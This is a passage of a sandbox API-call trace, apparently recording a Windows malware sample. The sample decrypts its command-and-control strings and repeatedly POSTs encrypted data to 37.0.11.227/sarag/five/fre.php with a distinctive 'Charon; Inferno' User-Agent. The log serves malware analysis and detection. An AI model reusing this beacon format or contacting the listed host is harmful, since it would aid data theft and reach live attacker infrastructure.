Flags=0x0, Size=0xf4) returned 0x6ad508 [0242.138] GetProcessHeap () returned 0x690000 [0242.139] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0242.139] send (s=0x664, buf=0x6ad508*, len=242, flags=0) returned 242 [0242.139] send (s=0x664, buf=0x6aba40*, len=159, flags=0) returned 159 [0242.139] GetProcessHeap () returned 0x690000 [0242.139] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0242.140] recv (in: s=0x664, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0242.218] GetProcessHeap () returned 0x690000 [0242.219] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0242.219] GetProcessHeap () returned 0x690000 [0242.219] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0242.220] GetProcessHeap () returned 0x690000 [0242.221] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0242.221] GetProcessHeap () returned 0x690000 [0242.221] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0242.221] closesocket (s=0x664) returned 0 [0242.222] GetProcessHeap () returned 0x690000 [0242.222] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0242.222] GetProcessHeap () returned 0x690000 [0242.222] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0242.222] GetProcessHeap () returned 0x690000 [0242.223] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0242.223] GetProcessHeap () returned 0x690000 [0242.223] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0242.224] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x890) returned 0x664 [0242.228] Sleep (dwMilliseconds=0xea60) [0242.229] GetProcessHeap () returned 0x690000 [0242.229] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0242.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.231] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0242.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.240] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0242.250] GetProcessHeap () returned 0x690000 [0242.250] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0242.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.251] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0242.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.253] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0242.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.254] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0242.254] GetProcessHeap () returned 0x690000 [0242.254] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0242.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.256] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0242.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.264] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0242.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.265] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0242.265] GetProcessHeap () returned 0x690000 [0242.265] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0242.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.267] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0242.267] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.268] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0242.268] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.269] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0242.273] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.273] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0242.273] GetProcessHeap () returned 0x690000 [0242.273] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0242.273] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0242.274] GetProcessHeap () returned 0x690000 [0242.274] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0242.274] GetProcessHeap () returned 0x690000 [0242.275] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0242.275] GetProcessHeap () returned 0x690000 [0242.275] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0242.275] GetProcessHeap () returned 0x690000 [0242.275] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0242.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.276] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0242.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.282] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0242.288] GetProcessHeap () returned 0x690000 [0242.288] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0242.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.292] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0242.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.293] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0242.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.294] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0242.294] GetProcessHeap () returned 0x690000 [0242.294] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0242.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.295] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0242.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.297] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0242.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.298] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0242.298] GetProcessHeap () returned 0x690000 [0242.298] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0242.298] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.299] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0242.299] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.300] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0242.301] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.301] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0242.304] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.304] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0242.304] GetProcessHeap () returned 0x690000 [0242.304] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0242.304] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0242.304] GetProcessHeap () returned 0x690000 [0242.304] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0242.305] socket (af=2, type=1, protocol=6) returned 0x668 [0242.305] connect (s=0x668, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0242.328] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0242.328] GetProcessHeap () returned 0x690000 [0242.329] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0242.329] GetProcessHeap () returned 0x690000 [0242.329] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0242.329] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0242.331] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0242.331] GetProcessHeap () returned 0x690000 [0242.331] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0242.331] GetProcessHeap () returned 0x690000 [0242.331] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0242.331] GetProcessHeap () returned 0x690000 [0242.331] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0242.331] GetProcessHeap () returned 0x690000 [0242.332] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0242.332] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0242.333] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0242.333] GetProcessHeap () returned 0x690000 [0242.333] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0242.333] GetProcessHeap () returned 0x690000 [0242.334] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0242.334] send (s=0x668, buf=0x6ad508*, len=242, flags=0) returned 242 [0242.334] send (s=0x668, buf=0x6aba40*, len=159, flags=0) returned 159 [0242.335] GetProcessHeap () returned 0x690000 [0242.335] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0242.335] recv (in: s=0x668, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0242.404] GetProcessHeap () returned 0x690000 [0242.405] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0242.405] GetProcessHeap () returned 0x690000 [0242.405] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0242.406] GetProcessHeap () returned 0x690000 [0242.406] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0242.407] GetProcessHeap () returned 0x690000 [0242.408] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0242.408] closesocket (s=0x668) returned 0 [0242.408] GetProcessHeap () returned 0x690000 [0242.408] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0242.408] GetProcessHeap () returned 0x690000 [0242.409] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0242.409] GetProcessHeap () returned 0x690000 [0242.409] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0242.409] GetProcessHeap () returned 0x690000 [0242.410] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0242.410] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x6dc) returned 0x668 [0242.414] Sleep (dwMilliseconds=0xea60) [0242.416] GetProcessHeap () returned 0x690000 [0242.416] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0242.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.418] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0242.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.426] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0242.432] GetProcessHeap () returned 0x690000 [0242.432] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0242.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.433] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0242.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.436] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0242.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.437] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0242.437] GetProcessHeap () returned 0x690000 [0242.437] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0242.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.438] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0242.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.439] CryptDestroyKey (hKey=0x69d628) returned 1 [0242.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.440] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0242.440] GetProcessHeap () returned 0x690000 [0242.440] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0242.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.441] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0242.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.442] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0242.443] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.443] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0242.444] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.444] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0242.444] GetProcessHeap () returned 0x690000 [0242.444] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0242.444] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0242.444] GetProcessHeap () returned 0x690000 [0242.445] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0242.449] GetProcessHeap () returned 0x690000 [0242.449] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0242.449] GetProcessHeap () returned 0x690000 [0242.449] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0242.449] GetProcessHeap () returned 0x690000 [0242.449] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0242.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.450] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0242.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.455] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0242.462] GetProcessHeap () returned 0x690000 [0242.463] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0242.463] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.464] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0242.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.464] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0242.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.465] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0242.465] GetProcessHeap () returned 0x690000 [0242.466] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0242.467] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.467] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0242.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.471] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0242.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.472] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0242.472] GetProcessHeap () returned 0x690000 [0242.472] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0242.472] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.473] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0242.473] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.473] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0242.474] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.474] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0242.475] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.475] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0242.475] GetProcessHeap () returned 0x690000 [0242.475] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0242.475] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0242.475] GetProcessHeap () returned 0x690000 [0242.475] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3a0 [0242.475] socket (af=2, type=1, protocol=6) returned 0x66c [0242.476] connect (s=0x66c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0242.537] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0242.537] GetProcessHeap () returned 0x690000 [0242.537] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0242.540] GetProcessHeap () returned 0x690000 [0242.540] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0242.541] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0242.542] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0242.542] GetProcessHeap () returned 0x690000 [0242.542] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0040 [0242.542] GetProcessHeap () returned 0x690000 [0242.542] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0242.542] GetProcessHeap () returned 0x690000 [0242.542] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0242.543] GetProcessHeap () returned 0x690000 [0242.543] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0242.543] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0242.546] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0242.546] GetProcessHeap () returned 0x690000 [0242.546] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0242.546] GetProcessHeap () returned 0x690000 [0242.546] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0242.546] send (s=0x66c, buf=0x6ad508*, len=242, flags=0) returned 242 [0242.547] send (s=0x66c, buf=0x6aba40*, len=159, flags=0) returned 159 [0242.547] GetProcessHeap () returned 0x690000 [0242.547] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0242.547] recv (in: s=0x66c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0242.627] GetProcessHeap () returned 0x690000 [0242.627] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0242.627] GetProcessHeap () returned 0x690000 [0242.628] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0242.628] GetProcessHeap () returned 0x690000 [0242.628] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0040 | out: hHeap=0x690000) returned 1 [0242.628] GetProcessHeap () returned 0x690000 [0242.629] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0242.629] closesocket (s=0x66c) returned 0 [0242.630] GetProcessHeap () returned 0x690000 [0242.630] HeapFree (in: hHeap=0x690000, 